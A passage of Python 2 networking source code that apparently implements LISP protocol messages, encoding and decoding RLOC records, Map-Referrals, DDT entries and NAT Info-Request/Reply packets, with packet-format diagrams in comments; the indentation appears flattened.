# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... Public Key Material |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Locator Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_rloc_record():
def __init__(self):
self.priority = 0
self.weight = 0
self.mpriority = 0
self.mweight = 0
self.local_bit = False
self.probe_bit = False
self.reach_bit = False
self.rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.geo = None
self.elp = None
self.rle = None
self.json = None
self.rloc_name = None
self.keys = None
#enddef
def print_rloc_name(self, cour=False):
if (self.rloc_name == None): return("")
rloc_name = self.rloc_name
if (cour): rloc_name = lisp_print_cour(rloc_name)
return('rloc-name: {}'.format(blue(rloc_name, cour)))
#enddef
def print_record(self, indent):
rloc_str = self.print_rloc_name()
if (rloc_str != ""): rloc_str = ", " + rloc_str
geo_str = ""
if (self.geo):
name = ""
if (self.geo.geo_name): name = "'{}' ".format(self.geo.geo_name)
geo_str = ", geo: {}{}".format(name, self.geo.print_geo())
#endif
elp_str = ""
if (self.elp):
name = ""
if (self.elp.elp_name): name = "'{}' ".format(self.elp.elp_name)
elp_str = ", elp: {}{}".format(name, self.elp.print_elp(True))
#endif
rle_str = ""
if (self.rle):
name = ""
if (self.rle.rle_name): name = "'{}' ".format(self.rle.rle_name)
rle_str = ", rle: {}{}".format(name, self.rle.print_rle(False))
#endif
json_str = ""
if (self.json):
name = ""
if (self.json.json_name):
name = "'{}' ".format(self.json.json_name)
#endif
json_str = ", json: {}".format(self.json.print_json(False))
#endif
sec_str = ""
if (self.rloc.is_null() == False and self.keys and self.keys[1]):
sec_str = ", " + self.keys[1].print_keys()
#endif
line = ("{}RLOC-record -> flags: {}, {}/{}/{}/{}, afi: {}, rloc: "
+ "{}{}{}{}{}{}{}")
lprint(line.format(indent, self.print_flags(), self.priority,
self.weight, self.mpriority, self.mweight, self.rloc.afi,
red(self.rloc.print_address_no_iid(), False), rloc_str, geo_str,
elp_str, rle_str, json_str, sec_str))
#enddef
def print_flags(self):
return("{}{}{}".format("L" if self.local_bit else "l", "P" \
if self.probe_bit else "p", "R" if self.reach_bit else "r"))
#enddef
def store_rloc_entry(self, rloc_entry):
rloc = rloc_entry.rloc if (rloc_entry.translated_rloc.is_null()) \
else rloc_entry.translated_rloc
self.rloc.copy_address(rloc)
if (rloc_entry.rloc_name):
self.rloc_name = rloc_entry.rloc_name
#endif
if (rloc_entry.geo):
self.geo = rloc_entry.geo
else:
name = rloc_entry.geo_name
if (name and lisp_geo_list.has_key(name)):
self.geo = lisp_geo_list[name]
#endif
#endif
if (rloc_entry.elp):
self.elp = rloc_entry.elp
else:
name = rloc_entry.elp_name
if (name and lisp_elp_list.has_key(name)):
self.elp = lisp_elp_list[name]
#endif
#endif
if (rloc_entry.rle):
self.rle = rloc_entry.rle
else:
name = rloc_entry.rle_name
if (name and lisp_rle_list.has_key(name)):
self.rle = lisp_rle_list[name]
#endif
#endif
if (rloc_entry.json):
self.json = rloc_entry.json
else:
name = rloc_entry.json_name
if (name and lisp_json_list.has_key(name)):
self.json = lisp_json_list[name]
#endif
#endif
self.priority = rloc_entry.priority
self.weight = rloc_entry.weight
self.mpriority = rloc_entry.mpriority
self.mweight = rloc_entry.mweight
#enddef
def encode_lcaf(self):
lcaf_afi = socket.htons(LISP_AFI_LCAF)
gpkt = ""
if (self.geo):
gpkt = self.geo.encode_geo()
#endif
epkt = ""
if (self.elp):
elp_recs = ""
for elp_node in self.elp.elp_nodes:
afi = socket.htons(elp_node.address.afi)
flags = 0
if (elp_node.eid): flags |= 0x4
if (elp_node.probe): flags |= 0x2
if (elp_node.strict): flags |= 0x1
flags = socket.htons(flags)
elp_recs += struct.pack("HH", flags, afi)
elp_recs += elp_node.address.pack_address()
#endfor
elp_len = socket.htons(len(elp_recs))
epkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_ELP_TYPE,
0, elp_len)
epkt += elp_recs
#endif
rpkt = ""
if (self.rle):
rle_recs = ""
for rle_node in self.rle.rle_nodes:
afi = socket.htons(rle_node.address.afi)
rle_recs += struct.pack("HBBH", 0, 0, rle_node.level, afi)
rle_recs += rle_node.address.pack_address()
if (rle_node.rloc_name):
rle_recs += struct.pack("H", socket.htons(LISP_AFI_NAME))
rle_recs += rle_node.rloc_name + "\0"
#endif
#endfor
rle_len = socket.htons(len(rle_recs))
rpkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_RLE_TYPE,
0, rle_len)
rpkt += rle_recs
#endif
jpkt = ""
if (self.json):
lcaf_len = socket.htons(len(self.json.json_string) + 2)
json_len = socket.htons(len(self.json.json_string))
jpkt = struct.pack("HBBBBHH", lcaf_afi, 0, 0, LISP_LCAF_JSON_TYPE,
0, lcaf_len, json_len)
jpkt += self.json.json_string
jpkt += struct.pack("H", 0)
#endif
spkt = ""
if (self.rloc.is_null() == False and self.keys and self.keys[1]):
spkt = self.keys[1].encode_lcaf(self.rloc)
#endif
npkt = ""
if (self.rloc_name):
npkt += struct.pack("H", socket.htons(LISP_AFI_NAME))
npkt += self.rloc_name + "\0"
#endif
apkt_len = len(gpkt) + len(epkt) + len(rpkt) + len(spkt) + 2 + \
len(jpkt) + self.rloc.addr_length() + len(npkt)
apkt_len = socket.htons(apkt_len)
apkt = struct.pack("HBBBBHH", lcaf_afi, 0, 0, LISP_LCAF_AFI_LIST_TYPE,
0, apkt_len, socket.htons(self.rloc.afi))
apkt += self.rloc.pack_address()
return(apkt + npkt + gpkt + epkt + rpkt + spkt + jpkt)
#enddef
def encode(self):
flags = 0
if (self.local_bit): flags |= 0x0004
if (self.probe_bit): flags |= 0x0002
if (self.reach_bit): flags |= 0x0001
packet = struct.pack("BBBBHH", self.priority, self.weight,
self.mpriority, self.mweight, socket.htons(flags),
socket.htons(self.rloc.afi))
if (self.geo or self.elp or self.rle or self.keys or self.rloc_name \
or self.json):
packet = packet[0:-2] + self.encode_lcaf()
else:
packet += self.rloc.pack_address()
#endif
return(packet)
#enddef
def decode_lcaf(self, packet, nonce):
packet_format = "HBBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return(None)
#
# Process AFI-List LCAF.
#
if (lcaf_type == LISP_LCAF_AFI_LIST_TYPE):
while (lcaf_len > 0):
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
packet_len = len(packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF):
packet = self.decode_lcaf(packet, nonce)
if (packet == None): return(None)
else:
packet = packet[format_size::]
self.rloc_name = None
if (afi == LISP_AFI_NAME):
packet, rloc_name = lisp_decode_dist_name(packet)
self.rloc_name = rloc_name
else:
self.rloc.afi = afi
packet = self.rloc.unpack_address(packet)
if (packet == None): return(None)
self.rloc.mask_len = self.rloc.host_mask_len()
#endif
#endif
lcaf_len -= packet_len - len(packet)
#endwhile
elif (lcaf_type == LISP_LCAF_GEO_COORD_TYPE):
#
# Process Geo-Coordinate LCAF.
#
geo = lisp_geo("")
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
if (packet == None): return(None)
self.geo = geo
elif (lcaf_type == LISP_LCAF_JSON_TYPE):
#
# Process JSON LCAF.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
json_len = struct.unpack(packet_format, packet[:format_size])[0]
json_len = socket.ntohs(json_len)
if (lcaf_len < format_size + json_len): return(None)
packet = packet[format_size::]
self.json = lisp_json("", packet[0:json_len])
packet = packet[json_len::]
elif (lcaf_type == LISP_LCAF_ELP_TYPE):
#
# Process ELP LCAF.
#
elp = lisp_elp(None)
elp.elp_nodes = []
while (lcaf_len > 0):
flags, afi = struct.unpack("HH", packet[:4])
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
elp_node = lisp_elp_node()
elp.elp_nodes.append(elp_node)
flags = socket.ntohs(flags)
elp_node.eid = (flags & 0x4)
elp_node.probe = (flags & 0x2)
elp_node.strict = (flags & 0x1)
elp_node.address.afi = afi
elp_node.address.mask_len = elp_node.address.host_mask_len()
packet = elp_node.address.unpack_address(packet[4::])
lcaf_len -= elp_node.address.addr_length() + 4
#endwhile
elp.select_elp_node()
self.elp = elp
elif (lcaf_type == LISP_LCAF_RLE_TYPE):
#
# Process RLE LCAF.
#
rle = lisp_rle(None)
rle.rle_nodes = []
while (lcaf_len > 0):
x, y, level, afi = struct.unpack("HBBH", packet[:6])
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
rle_node = lisp_rle_node()
rle.rle_nodes.append(rle_node)
rle_node.level = level
rle_node.address.afi = afi
rle_node.address.mask_len = rle_node.address.host_mask_len()
packet = rle_node.address.unpack_address(packet[6::])
lcaf_len -= rle_node.address.addr_length() + 6
if (lcaf_len >= 2):
afi = struct.unpack("H", packet[:2])[0]
if (socket.ntohs(afi) == LISP_AFI_NAME):
packet = packet[2::]
packet, rle_node.rloc_name = \
lisp_decode_dist_name(packet)
if (packet == None): return(None)
lcaf_len -= len(rle_node.rloc_name) + 1 + 2
#endif
#endif
#endwhile
self.rle = rle
self.rle.build_forwarding_list()
elif (lcaf_type == LISP_LCAF_SECURITY_TYPE):
#
# Get lisp_key() data structure so we can parse keys in the Map-
# Reply RLOC-record. Then get the RLOC address.
#
orig_packet = packet
decode_key = lisp_keys(1)
packet = decode_key.decode_lcaf(orig_packet, lcaf_len)
if (packet == None): return(None)
#
# Other side may not do ECDH.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_CHACHA]
if (decode_key.cipher_suite in cs_list):
if (decode_key.cipher_suite == LISP_CS_25519_CBC):
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
if (decode_key.cipher_suite == LISP_CS_25519_CHACHA):
key = lisp_keys(1, do_poly=True, do_chacha=True)
#endif
else:
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
packet = key.decode_lcaf(orig_packet, lcaf_len)
if (packet == None): return(None)
if (len(packet) < 2): return(None)
afi = struct.unpack("H", packet[:2])[0]
self.rloc.afi = socket.ntohs(afi)
if (len(packet) < self.rloc.addr_length()): return(None)
packet = self.rloc.unpack_address(packet[2::])
if (packet == None): return(None)
self.rloc.mask_len = self.rloc.host_mask_len()
#
# Some RLOC records may not have RLOC addresses but other LCAF
# types. Don't process security keys because we need RLOC addresses
# to index into security data structures.
#
if (self.rloc.is_null()): return(packet)
rloc_name_str = self.rloc_name
if (rloc_name_str): rloc_name_str = blue(self.rloc_name, False)
#
# If we found no stored key, store the newly created lisp_keys()
# to the RLOC list if and only if a remote public-key was supplied
# in the Map-Reply.
#
stored_key = self.keys[1] if self.keys else None
if (stored_key == None):
if (key.remote_public_key == None):
string = bold("No remote encap-public-key supplied", False)
lprint(" {} for {}".format(string, rloc_name_str))
key = None
else:
string = bold("New encap-keying with new state", False)
lprint(" {} for {}".format(string, rloc_name_str))
key.compute_shared_key("encap")
#endif
#endif
#
# If we have stored-key, the other side received the local public
# key that is stored in variable 'stored_key'. If the remote side
# did not supply a public-key, it doesn't want to do lisp-crypto.
# If it did supply a public key, check to see if the same as
# last time, and if so, do nothing, else we do a rekeying.
#
if (stored_key):
if (key.remote_public_key == None):
key = None
remote = bold("Remote encap-unkeying occurred", False)
lprint(" {} for {}".format(remote, rloc_name_str))
elif (stored_key.compare_keys(key)):
key = stored_key
lprint(" Maintain stored encap-keys for {}".format( \
rloc_name_str))
else:
if (stored_key.remote_public_key == None):
string = "New encap-keying for existing state"
else:
string = "Remote encap-rekeying"
#endif
lprint(" {} for {}".format(bold(string, False),
rloc_name_str))
stored_key.remote_public_key = key.remote_public_key
stored_key.compute_shared_key("encap")
key = stored_key
#endif
#endif
self.keys = [None, key, None, None]
else:
#
# All other LCAFs we skip over and ignore.
#
packet = packet[lcaf_len::]
#endif
return(packet)
#enddef
def decode(self, packet, nonce):
packet_format = "BBBBHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.priority, self.weight, self.mpriority, self.mweight, flags, \
afi = struct.unpack(packet_format, packet[:format_size])
flags = socket.ntohs(flags)
afi = socket.ntohs(afi)
self.local_bit = True if (flags & 0x0004) else False
self.probe_bit = True if (flags & 0x0002) else False
self.reach_bit = True if (flags & 0x0001) else False
if (afi == LISP_AFI_LCAF):
packet = packet[format_size-2::]
packet = self.decode_lcaf(packet, nonce)
else:
self.rloc.afi = afi
packet = packet[format_size::]
packet = self.rloc.unpack_address(packet)
#endif
self.rloc.mask_len = self.rloc.host_mask_len()
return(packet)
#enddef
def end_of_rlocs(self, packet, rloc_count):
for i in range(rloc_count):
packet = self.decode(packet, None)
if (packet == None): return(None)
#endfor
return(packet)
#enddef
#endclass
#
# Map-Referral Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=6 | Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Referral Count| EID mask-len | ACT |A|I| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c |SigCnt | Map Version Number | EID-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-prefix ... |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |R| Loc/LCAF-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator ... |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_referral():
def __init__(self):
self.record_count = 0
self.nonce = 0
#enddef
def print_map_referral(self):
lprint("{} -> record-count: {}, nonce: 0x{}".format( \
bold("Map-Referral", False), self.record_count,
lisp_hex_string(self.nonce)))
#enddef
def encode(self):
first_long = (LISP_MAP_REFERRAL << 28) | self.record_count
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.record_count = first_long & 0xff
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.nonce = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
return(packet)
#enddef
#endclass
#
# This is a DDT cache type data structure that holds information configured
# in the "lisp ddt-authoritative-prefix" and "lisp delegate" commands. The
# self.delegatione_set[] is a list of lisp_ddt_node()s.
#
class lisp_ddt_entry():
def __init__(self):
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.uptime = lisp_get_timestamp()
self.delegation_set = []
self.source_cache = None
self.map_referrals_sent = 0
#enddef
def is_auth_prefix(self):
if (len(self.delegation_set) != 0): return(False)
if (self.is_star_g()): return(False)
return(True)
#enddef
def is_ms_peer_entry(self):
if (len(self.delegation_set) == 0): return(False)
return(self.delegation_set[0].is_ms_peer())
#enddef
def print_referral_type(self):
if (len(self.delegation_set) == 0): return("unknown")
ddt_node = self.delegation_set[0]
return(ddt_node.print_node_type())
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_ddt_cache.add_cache(self.eid, self)
else:
ddt = lisp_ddt_cache.lookup_cache(self.group, True)
if (ddt == None):
ddt = lisp_ddt_entry()
ddt.eid.copy_address(self.group)
ddt.group.copy_address(self.group)
lisp_ddt_cache.add_cache(self.group, ddt)
#endif
if (self.eid.is_null()): self.eid.make_default_route(ddt.group)
ddt.add_source_entry(self)
#endif
#enddef
def add_source_entry(self, source_ddt):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_ddt.eid, source_ddt)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def is_star_g(self):
if (self.group.is_null()): return(False)
return(self.eid.is_exact_match(self.group))
#enddef
#endclass
class lisp_ddt_node():
def __init__(self):
self.delegate_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.public_key = ""
self.map_server_peer = False
self.map_server_child = False
self.priority = 0
self.weight = 0
#enddef
def print_node_type(self):
if (self.is_ddt_child()): return("ddt-child")
if (self.is_ms_child()): return("map-server-child")
if (self.is_ms_peer()): return("map-server-peer")
#enddef
def is_ddt_child(self):
if (self.map_server_child): return(False)
if (self.map_server_peer): return(False)
return(True)
#enddef
def is_ms_child(self):
return(self.map_server_child)
#enddef
def is_ms_peer(self):
return(self.map_server_peer)
#enddef
#endclass
#
# This is a Map-Request queue used on a Map-Resolver when waiting for a
# Map-Referral to be retunred by a DDT-node or a Map-Server.
#
class lisp_ddt_map_request():
def __init__(self, lisp_sockets, packet, eid, group, nonce):
self.uptime = lisp_get_timestamp()
self.lisp_sockets = lisp_sockets
self.packet = packet
self.eid = eid
self.group = group
self.nonce = nonce
self.mr_source = None
self.sport = 0
self.itr = None
self.retry_count = 0
self.send_count = 0
self.retransmit_timer = None
self.last_request_sent_to = None
self.from_pitr = False
self.tried_root = False
self.last_cached_prefix = [None, None]
#enddef
def print_ddt_map_request(self):
lprint("Queued Map-Request from {}ITR {}->{}, nonce 0x{}".format( \
"P" if self.from_pitr else "",
red(self.itr.print_address(), False),
green(self.eid.print_address(), False), self.nonce))
#enddef
def queue_map_request(self):
self.retransmit_timer = threading.Timer(LISP_DDT_MAP_REQUEST_INTERVAL,
lisp_retransmit_ddt_map_request, [self])
self.retransmit_timer.start()
lisp_ddt_map_requestQ[str(self.nonce)] = self
#enddef
def dequeue_map_request(self):
self.retransmit_timer.cancel()
if (lisp_ddt_map_requestQ.has_key(str(self.nonce))):
lisp_ddt_map_requestQ.pop(str(self.nonce))
#endif
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
#endclass
#
# -------------------------------------------------------------------
# Type (Action field) Incomplete Referral-set TTL values
# -------------------------------------------------------------------
# 0 NODE-REFERRAL NO YES 1440
#
# 1 MS-REFERRAL NO YES 1440
#
# 2 MS-ACK * * 1440
#
# 3 MS-NOT-REGISTERED * * 1
#
# 4 DELEGATION-HOLE NO NO 15
#
# 5 NOT-AUTHORITATIVE YES NO 0
# -------------------------------------------------------------------
#
LISP_DDT_ACTION_SITE_NOT_FOUND = -2
LISP_DDT_ACTION_NULL = -1
LISP_DDT_ACTION_NODE_REFERRAL = 0
LISP_DDT_ACTION_MS_REFERRAL = 1
LISP_DDT_ACTION_MS_ACK = 2
LISP_DDT_ACTION_MS_NOT_REG = 3
LISP_DDT_ACTION_DELEGATION_HOLE = 4
LISP_DDT_ACTION_NOT_AUTH = 5
LISP_DDT_ACTION_MAX = LISP_DDT_ACTION_NOT_AUTH
lisp_map_referral_action_string = [
"node-referral", "ms-referral", "ms-ack", "ms-not-registered",
"delegation-hole", "not-authoritative"]
#
# Info-Request/Reply
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=7 |R| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reserved | EID mask-len | EID-prefix-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-prefix |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Info-Request specific information following the EID-prefix:
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 0 | <Nothing Follows AFI=0> |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Info-Reply specific information following the EID-prefix:
#
# +->+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = 16387 | Rsvd1 | Flags |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Type = 7 | Rsvd2 | 4 + n |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# N | MS UDP Port Number | ETR UDP Port Number |
# A +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# T | AFI = x | Global ETR RLOC Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# L | AFI = x | MS RLOC Address ... |
# C +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# A | AFI = x | Private ETR RLOC Address ... |
# F +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = x | RTR RLOC Address 1 ... |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = x | RTR RLOC Address n ... |
# +->+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# This encoding will not use authentication so we respond to anyone who
# sends an Info-Request. And the EID-prefix will have AFI=0.
#
class lisp_info():
def __init__(self):
self.info_reply = False
self.nonce = 0
self.private_etr_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.global_etr_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.global_ms_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.ms_port = 0
self.etr_port = 0
self.rtr_list = []
self.hostname = lisp_hostname
#enddef
def print_info(self):
if (self.info_reply):
req_or_reply = "Info-Reply"
rloc = (", ms-port: {}, etr-port: {}, global-rloc: {}, " + \
"ms-rloc: {}, private-rloc: {}, RTR-list: ").format( \
self.ms_port, self.etr_port,
red(self.global_etr_rloc.print_address_no_iid(), False),
red(self.global_ms_rloc.print_address_no_iid(), False),
red(self.private_etr_rloc.print_address_no_iid(), False))
if (len(self.rtr_list) == 0): rloc += "empty, "
for rtr in self.rtr_list:
rloc += red(rtr.print_address_no_iid(), False) + ", "
#endfor
rloc = rloc[0:-2]
else:
req_or_reply = "Info-Request"
hostname = "<none>" if self.hostname == None else self.hostname
rloc = ", hostname: {}".format(blue(hostname, False))
#endif
lprint("{} -> nonce: 0x{}{}".format(bold(req_or_reply, False),
lisp_hex_string(self.nonce), rloc))
#enddef
def encode(self):
first_long = (LISP_NAT_INFO << 28)
if (self.info_reply): first_long |= (1 << 27)
#
# Encode first-long, nonce, key-id longword, TTL and EID mask-len/
# EID-prefix AFI. There is no auth data field since auth len is 0.
#
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
packet += struct.pack("III", 0, 0, 0)
#
# Add hostname null terminated string with AFI 17,
#
if (self.info_reply == False):
if (self.hostname == None):
packet += struct.pack("H", 0)
else:
packet += struct.pack("H", socket.htons(LISP_AFI_NAME))
packet += self.hostname + "\0"
#endif
return(packet)
#endif
#
# If Info-Reply, encode Type 7 LCAF.
#
afi = socket.htons(LISP_AFI_LCAF)
lcaf_type = LISP_LCAF_NAT_TYPE
lcaf_len = socket.htons(16)
ms_port = socket.htons(self.ms_port)
etr_port = socket.htons(self.etr_port)
packet += struct.pack("HHBBHHHH", afi, 0, lcaf_type, 0, lcaf_len,
ms_port, etr_port, socket.htons(self.global_etr_rloc.afi))
packet += self.global_etr_rloc.pack_address()
packet += struct.pack("HH", 0, socket.htons(self.private_etr_rloc.afi))
packet += self.private_etr_rloc.pack_address()
if (len(self.rtr_list) == 0): packet += struct.pack("H", 0)
#
# Encode RTR list.
#
for rtr in self.rtr_list:
packet += struct.pack("H", socket.htons(rtr.afi))
packet += rtr.pack_address()
#endfor
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long)
self.nonce = nonce[0]
self.info_reply = first_long & 0x08000000
self.hostname = None
packet = packet[format_size::]
#
# Parse key-id, auth-len, auth-data, and EID-record. We don't support
# any of these. On encode, we set 3 longs worth of 0.
#
packet_format = "HH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
#
# If an LCAF value appears in the key-id field, then this is an
# old style Echo-Reply (that NX-OS implemented).
#
key_id, auth_len = struct.unpack(packet_format, packet[:format_size])
if (auth_len != 0): return(None)
packet = packet[format_size::]
packet_format = "IBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
ttl, rsvd, ml, eid_afi = struct.unpack(packet_format,
packet[:format_size])
if (eid_afi != 0): return(None)
packet = packet[format_size::]
#
# Check if name supplied.
#
if (self.info_reply == False):
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) >= format_size):
afi = struct.unpack(packet_format, packet[:format_size])[0]
if (socket.ntohs(afi) == LISP_AFI_NAME):
packet = packet[format_size::]
packet, self.hostname = lisp_decode_dist_name(packet)
#endif
#endif
return(orig_packet)
#endif
#
# Process Info-Reply.
#
packet_format = "HHBBHHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, x, lcaf_type, rsvd, lcaf_len, ms_port, etr_port = \
struct.unpack(packet_format, packet[:format_size])
if (socket.ntohs(afi) != LISP_AFI_LCAF): return(None)
self.ms_port = socket.ntohs(ms_port)
self.etr_port = socket.ntohs(etr_port)
packet = packet[format_size::]
#
# Get addresses one AFI at a time.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
#
# Get global ETR RLOC address.
#
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.global_etr_rloc.afi = socket.ntohs(afi)
packet = self.global_etr_rloc.unpack_address(packet)
if (packet == None): return(None)
self.global_etr_rloc.mask_len = \
self.global_etr_rloc.host_mask_len()
#endif
#
# Get global MS RLOC address.
#
if (len(packet) < format_size): return(orig_packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.global_ms_rloc.afi = socket.ntohs(afi)
packet = self.global_ms_rloc.unpack_address(packet)
if (packet == None): return(orig_packet)
